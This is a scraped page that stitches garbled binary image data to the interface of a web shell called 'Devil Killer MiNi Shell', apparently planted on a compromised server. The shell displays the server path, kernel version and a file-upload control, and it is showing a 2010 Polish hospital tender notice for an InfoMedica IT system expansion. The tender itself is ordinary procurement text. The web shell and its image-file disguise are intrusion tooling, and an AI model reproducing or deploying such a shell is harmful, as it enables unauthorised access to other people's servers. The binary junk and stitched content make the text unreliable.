JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100902/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100902/275440-N-2010.html

<p class="kh_header"><b>Nowa Dęba: Rozbudowa Zintegrowanego Systemu Informatycznego Szpitala 
       - InfoMedica Firmy Asseco Poland S.A. o moduły : Administracja, Ruch Chorych, Apteczka 
      Oddziałowa wraz z dostawą sprzętu komputerowego i oprogramowania oraz urządzeń   
      peryferyjnych i innych niezbędnych urządzeń komputerowych w ramach projektu      
      pn.Kompleksowa informatyzacja SPZZOZ w Nowej Dębie jako element PSIM komplementarnego 
      z projektem  Podkarpacki System Informacji Medycznej  PSIM.</b><br>
<b>Numer ogłoszenia: 275440 - 2010; data zamieszczenia: 02.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Nowej Dębie , ul. M. Curie-Skłodowskiej 1a, 39-460 Nowa Dęba, woj. podkarpackie, tel. 015 84612651 w. 158.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoznowadeba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa Zintegrowanego Systemu Informatycznego Szpitala 
       - InfoMedica Firmy Asseco Poland S.A. o moduły : Administracja, Ruch Chorych, Apteczka 
      Oddziałowa wraz z dostawą sprzętu komputerowego i oprogramowania oraz urządzeń   
      peryferyjnych i innych niezbędnych urządzeń komputerowych w ramach projektu      
      pn.Kompleksowa informatyzacja SPZZOZ w Nowej Dębie jako element PSIM komplementarnego 
      z projektem  Podkarpacki System Informacji Medycznej  PSIM..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rozbudowa Zintegrowanego Systemu Informatycznego Szpitala 
       - InfoMedica Firmy Asseco Poland S.A. o moduły : Administracja, Ruch Chorych, Apteczka 
      Oddziałowa wraz z dostawą sprzętu komputerowego i oprogramowania oraz urządzeń   
      peryferyjnych i innych niezbędnych urządzeń komputerowych w ramach projektu      
      pn.Kompleksowa informatyzacja SPZZOZ w Nowej Dębie jako element PSIM komplementarnego 
      z projektem  Podkarpacki System Informacji Medycznej PSIM.

      W ramach którego realizowane będą:

       Zadanie 1. Dostawa dodatkowych licencji oprogramowana aplikacyjnego obsługującego część medyczną 
                       szpitala wraz  z dostawą i wdrożeniem licencji obejmujących część administracyjną szpitala;
       Zadanie 2. Dostawa i konfiguracja fabrycznie nowego sprzętu komputerowego, urządzeń peryferyjnych,               
                       oprogramowania operacyjnego;

      Opis przedmiotu zamówienia stanowi Załącznik nr 1 do SIWZ, natomiast szczegółowy opis przedmiotu 
      zamówienia stanowi Załącznik nr 2 do SIWZ - Formularz  Wymagań Funkcjonalnych Oprogramowania 
      Aplikacyjnego oraz Sprzętu.
 
Dostawę przedmiotu zamówienia do siedziby Zamawiającego zapewnia Wykonawca, ponosząc koszty i ryzyko    
transportu, montaż oraz uruchomienie wraz ze szkoleniem personelu  
Zamawiający wymaga aby zaoferowany sprzęt posiadał szczegółowe instrukcje obsługi w języku polskim.  
      Oferowany sprzęt musi spełniać wszystkie parametry wymienione w załączniku nr 2 do SIWZ -  Formularz 
      Wymagań Funkcjonalnych Oprogramowania Aplikacyjnego oraz Sprzętu.
      Wykonawca zobowiązany jest do wypełnienia wszystkich pozycji w Załączniku nr 2 do SIWZ. 
      Nie spełnienie któregokolwiek z nich skutkować będzie odrzuceniem oferty Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.20.00-4, 30.23.31.41-1, 30.23.31.60-0, 30.23.60.00-2, 35.12.60.00-3, 48.00.00.00-8, 48.18.00.00-3, 48.21.40.00-1, 48.21.90.00-6, 48.21.94.00-0, 48.41.20.00-9, 48.44.20.00-8, 48.44.30.00-5, 48.62.00.00-0, 48.82.00.00-2, 72.26.30.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w kwocie  10 000,00  zł ( słownie: dziesięć tysięcy 
             złotych)
        2. Wadium wnosi się przed upływem terminu składania ofert.
        3. Wadium może być wnoszone w jednej lub kilku następujących formach:
            1) pieniądzu;
            2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
                że poręczenie kasy jest zawsze poręczeniem pieniężnym;
            3) gwarancjach bankowych ;
            4) gwarancjach ubezpieczeniowych;
            5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt. 2 ustawy z dnia 
                9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U.109,poz.1158, 
                z późn.zm.).
        4. Wadium w formie pieniędzy musi być wniesione przelewem - na rachunek Zamawiającego BANK 
            PEKAO S.A. O/Tarnobrzeg nr 07 1240 2744 1111 0000 3990 9648 nie później niż w terminie składania 
            ofert.
        5. W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę 
            uznania rachunku Zamawiającego.
        6. Kserokopię dowodu wniesienia wadium należy złożyć w ofercie.
        7. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
        8. Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania.

         ZWROT  WADIUM;
1. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej 
    lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako     
    najkorzystniejsza, z zastrzeżeniem ust.4a.
         1a.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium 
              niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia 
              należytego wykonania umowy, jeżeli jego wniesienia żądano.
          2. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem 
             terminu składania ofert.


          3. Zamawiajacy żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na 
              podstawie ust.1, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako 
              najkorzystniejsza.
              Wykonawca wnosi wadium w terminie okreslonym przez zamawiajacego.
    4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy  rachunku 
        bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz 
        prowizji  bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

  4a. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa 
        w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba że    
        udowodni, ze wynika to z przyczyn nieleżących po jego stronie.

           5.  Zamawiajacy zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca,którego oferta została wybrana:
       1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
       2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
               3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie 
                   wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest złożyć wymagane oświadczenia oraz dokumenty zgodnie z zapisami SIWZ.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie analizy załączonych dokumentów i oświadczeń według formuły spełnia / nie spełnia wymaganego warunku.
Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z Załącznikiem nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest złożyć wymagane oświadczenia oraz dokumenty zgodnie z zapisami SIWZ.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie analizy załączonych dokumentów i oświadczeń według formuły spełnia / 
nie spełnia wymaganego warunku.
Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z Załącznikiem nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest złożyć wymagane oświadczenia oraz dokumenty zgodnie z zapisami SIWZ.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie analizy załączonych dokumentów i oświadczeń według formuły spełnia / nie spełnia wymaganego warunku.
Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z Załącznikiem nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest złożyć wymagane oświadczenia oraz dokumenty zgodnie z zapisami SIWZ.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie analizy załączonych dokumentów i oświadczeń według formuły spełnia / nie spełnia wymaganego warunku.
Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z Załącznikiem nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest złożyć wymagane oświadczenia oraz dokumenty zgodnie z zapisami SIWZ.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie analizy załączonych dokumentów i oświadczeń według formuły spełnia / nie spełnia wymaganego warunku.
Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z Załącznikiem nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- Oświadczenie, iż oferowany  sprzęt  posiada odpowiednie dokumenty i są  one aktualne dla przedmiotowego  
                         postępowania tj. Dklaracja zgodności CE  / jeśli prawo nakłada obowiązek posiadania  takich dokumentów/.
- Wykonawca jest zobowiązany do załączenia materiałów potwierdzających zgodność zaoferowanych
                   parametrów i konfiguracji przedmiotu zamówienia ( prospekty lub broszury lub wyciągi z instrukcji lub
                   foldery lub zdjęcia);
-Zaświadczenia podmiotu uprawnionego do kontroli jakości że producent oprogramowania 
                  aplkacyjnego spełnia określone wymogi jakościowe co najmniej w zakresie projektowania  
                  i wykonywania systemów informatycznych, np.: certyfikat ISO 9001:2000 lub równoważny;
-Zaświadczenia podmiotu uprawnionego do kontroli jakości  iż podmiot świadczący usługi  wdrożenia
             i serwisu oprogramowania aplikacyjnego spełnia określone wymogi jakościowe odpowiednio 
             do wykonywanych w trakcie zamówienia usług w zakresie wdrażania systemów informatycznych oraz 
       świadczenia do nich usług serwisowych, np.: certyfikat ISO 9001:2000 lub równoważny;</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Wykaz wykonanych dostaw w zakresie  niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w 
         okresie ostatnich trzech lat  przed upływem terminu skladania ofert ,  odpowiadających  wartością i zakresem 
                        przedmiotowemu  zamówieniu , a jeżeli okres prowadzenia  działalności jest  krótszy  w tym okresie  z podaniem ich 
                        wartości, dat  wykonania i odbiorców co najmniej :
-	jednego zadania  polegającego  na dostawie i wdrożeniu zintegrowanego systemu informatycznego w części administracyjnej  i medycznej .
-	jednego zadania polegajacego na dostawie, instalacji i konfiguracji sprzętu  komputerowego i oprogramowania
operacyjnego .
                        oraz  załączenie dokumentu potwierdzającego, że dostawy  zostały  wykonane  należycie;
-Zgodnie z art. 26 ust.2b ustawy Prawo zamówień publicznych, Wykonawca może polegać na wiedzy i 
                  doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach 
                  finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
  Wykonawca w takiej sytuacji zobowiazany jest udowodnić zamawiającemu, iż będzie dysponował   
  zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
  zobowiazanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania    
                  z nich przy wykonaniu zamówienia.
-dokument  z którego wynika upoważnienie Wykonawcy do podpisywania oferty lub pełnomocnictwo do 
                    reprezentowania  wykonawcy, o ile ofertę składa pełnomocnik. 
      Dokumenty  wymagane w przypadku składania  oferty wspólnej:
     -  Oferta winna zawierać dokumenty dla każdego partnera z osobna;
     -  Pełnomocnictwo do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia i zawarcia umowy w  sprawie         
        zamówienia ;  
     Wszystkie dokumenty, o których mowa mogą być przedstawione w formie oryginału lub kserokopii   poświadczonej za 
     zgodność z oryginałem  przez  Wykonawcę. 
     Wykonawca udostępni Zamawiającemu w/w dokumenty na każde żądanie  Zamawiającego.
    Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez 
    Zamawiającego  oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli 
    pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których 
    mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w 
    wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne 
    byłoby unieważnienie postępowania.
    Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez 
    Wykonawcę warunków SIWZ -  udziału w postępowaniu oraz spełnianie przez oferowane usługi,  wymagań 
    określonych przez Zamawiającego, nie później niż w dniu w którym upłynął termin składania ofert.
    Zamawiający może wezwać do złożenia wyjaśnień w wyznaczonym przez siebie terminie, dotyczących 
    oświadczeń lub dokumentów, o których mowa w art. 25 ust.1.
Dokumenty określone w SIWZ jako skład  oferty tj:
     a/ Dokumenty i oświadczenia  wymienione powyżej oraz w pkt III.4 i pkt III.5 ;
      b/ Podpisany Załącznik nr 1 do SIWZ -  Opis przedmiotu zamówienia  
      c/  Wypełniony i podpisany Załącznik nr 2 do SIWZ  - Formularz Wymagań Funkcjonalnych Oprogramowania 
        Aplikacyjnego oraz Sprzętu;
     d/  Wypełniony i podpisany Załącznik nr 3 do SIWZ - Formularz Ofertowo - Cenowy Wykonawcy
     e/  Wypełniony i podpisany Załącznik nr 4 do SIWZ   -  Oświadczenie o spełnieniu warunków udziału w 
        postępowaniu
     f/   Wypełniony i podpisany Załącznik nr 5 do SIWZ  -  Oświadczenie Wykonawcy o braku podstaw do 
           wykluczenia
     g/  Wypełniony i podpisany Załącznik nr 6 do SIWZ - Zwrot wadium
     h/  Parafowany na każdej stronie Załącznik nr 7 do SIWZ -   Wzór umowy
     i/   Dokumenty potwierdzające kwalifikacje Wykonawców zgodnie z poniższym wykazem:
          - minimum 1 kierownika projektu, posiadającego co najmniej 5 letnie doświadczenie we 
           wdrażaniu systemów informatycznych, posiadającego certyfikat z metodyki zarządzania 
           projektami IMPA, na poziomie co najmniej Projekt Manager lub równoważny, jak poniżej 
           wyszczególniony w tabeli:

Wystawca 
	         IPMA	         PMI 	        APMG
Skrócona nazwa	IPMA-C	PMP	Prince2 Practitioner
Pełna nazwa certyfikatu	IPMA Level C:Certified Project
Manager
	Project Management professional	Prince2 Practitioner
Tytuł	Project Manager	Project Manager	Project Manager
            Ponadto udział w minimum 1 projekcie wdrożeniowym systemu informatycznego szpitala w zakresie 
            części administracyjnej na stanowisku kierownika projektu - do oferty należy dołączyć odpowiednie 
            dokumenty potwierdzające posiadanie wymaganych kwalifikacji.

